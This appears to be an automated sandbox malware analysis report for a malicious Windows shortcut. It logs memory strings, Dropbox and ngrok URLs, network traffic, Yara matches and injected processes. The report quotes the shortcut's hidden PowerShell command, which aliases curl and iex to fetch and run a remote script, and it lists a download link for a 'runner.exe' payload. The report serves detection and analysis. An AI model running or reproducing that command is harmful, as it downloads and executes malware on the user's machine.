Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://showcase.dropbox.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uc60c26e4725b7ba7605f3b031bb.dl.dropboxusercontent.com
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uc60c26e4725b7ba7605f3b031bb.dl.dropboxusercontent.com/cd/0/get/CgadaRKEOwA5MRXWVZEddfKXWjH4
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ucba4b1078bde293defc150c5894.dl.dropboxusercontent.com/cd/0/get/CgZSpmkgglMHW_xaaU7yqi82x2q8
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ucba4b1078bde293defc150c5894.dl.dropboxusercontent.com0
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.docsend.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AE01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/page_success/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/pithos/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/playlist/
Source: powershell.exe, 0000000F.00000002.2247336096.000001CA08B96000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2247873077.000001CA08E14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppu
Source: powershell.exe, 0000000F.00000002.2293605870.000001CA22E80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzd.
Source: powershell.exe, 0000000F.00000002.2247336096.000001CA08B96000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2247873077.000001CA08E14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/service_worker.js
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/static/api/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/static/serviceworker/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/v/s/playlist/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropboxstatic.com/static/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hellofax.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hellosign.com/
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.paypal.com/sdk/js

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 3.125.102.39:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.8:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.8:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.8:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.6.122.107:443 -> 192.168.2.8:49791 version: TLS 1.2

Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000000.2204473114.00000000029D0000.00000008.00000001.01000000.0000000E.sdmp

Binary or memory string: DirectInput8Create

memstr_bb0c106c-8

Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2366306467.00000000053B0000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_c0a6dcb4-8

Source: Yara match	File source: 29.3.fontdrvhost.exe.5690000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.fontdrvhost.exe.58b0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.f403e587-89ca-44df-ac2b-662ec52ae877.exe.55d0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.fontdrvhost.exe.58b0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.fontdrvhost.exe.5690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.fontdrvhost.exe.5690000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.f403e587-89ca-44df-ac2b-662ec52ae877.exe.53b0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.f403e587-89ca-44df-ac2b-662ec52ae877.exe.53b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.f403e587-89ca-44df-ac2b-662ec52ae877.exe.53b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.f403e587-89ca-44df-ac2b-662ec52ae877.exe.53b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000003.2366306467.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2371047023.0000000005690000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.2371296262.00000000058B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.2366537028.00000000055D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: f403e587-89ca-44df-ac2b-662ec52ae877.exe PID: 8692, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 8808, type: MEMORYSTR

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe

Jump to dropped file

Windows shortcut file (LNK) contains suspicious command line arguments

Source: pkqLAMAv96.lnk

LNK file: /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias ba64 curl ; sal a6eb iEx ; a6eb(ba64 -Uri https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2 -UseBasicParsing)

Source: C:\Windows\System32\fontdrvhost.exe	Code function: 34_2_000001ACA8CC1CF4 NtAcceptConnectPort,CloseHandle,	34_2_000001ACA8CC1CF4
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 34_2_000001ACA8CC0AC8 NtAcceptConnectPort,NtAcceptConnectPort,	34_2_000001ACA8CC0AC8
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 34_2_000001ACA8CC15C0 NtAcceptConnectPort,	34_2_000001ACA8CC15C0
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 34_2_000001ACA8CC1AA4 NtAcceptConnectPort,NtAcceptConnectPort,	34_2_000001ACA8CC1AA4

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4AFBA3F8	15_2_00007FFB4AFBA3F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4AFB93E8	15_2_00007FFB4AFB93E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4AFBC308	15_2_00007FFB4AFBC308
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFB4AFB9A48	15_2_00007FFB4AFB9A48
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Code function: 28_3_02C5C231	28_3_02C5C231
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Code function: 28_3_02C681D2	28_3_02C681D2
Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe	Code function: 28_3_02C5C400	28_3_02C5C400
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 34_2_000001ACA8CC0C70	34_2_000001ACA8CC0C70

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe 4CD95BF0380DE67906211A1F7609EE91FF705D85EE45E14B1CAC6BED13D53C19

Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe

Code function: String function: 02C5CD90 appears 33 times

Source: C:\Users\user\AppData\Local\Temp\f403e587-89ca-44df-ac2b-662ec52ae877.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8692 -s 424

Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2354917207.0000000004929000.00000040.00001000.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2353709399.0000000002B45000.00000040.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2367671427.0000000002C79000.00000040.00000400.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2363531845.0000000002C79000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2354917207.0000000004929000.00000040.00001000.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2353709399.0000000002B45000.00000040.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2367671427.0000000002C79000.00000040.00000400.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2363531845.0000000002C79000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_

Source: classification engine

Classification label: mal100.troj.evad.winLNK@82/282@20/12

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\fontdrvhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-e29e6db8-75ad-66a800-a519b0931317}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5884
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8312:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_520xxuwh.1mu.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\39750847.bat" "

Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM ' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
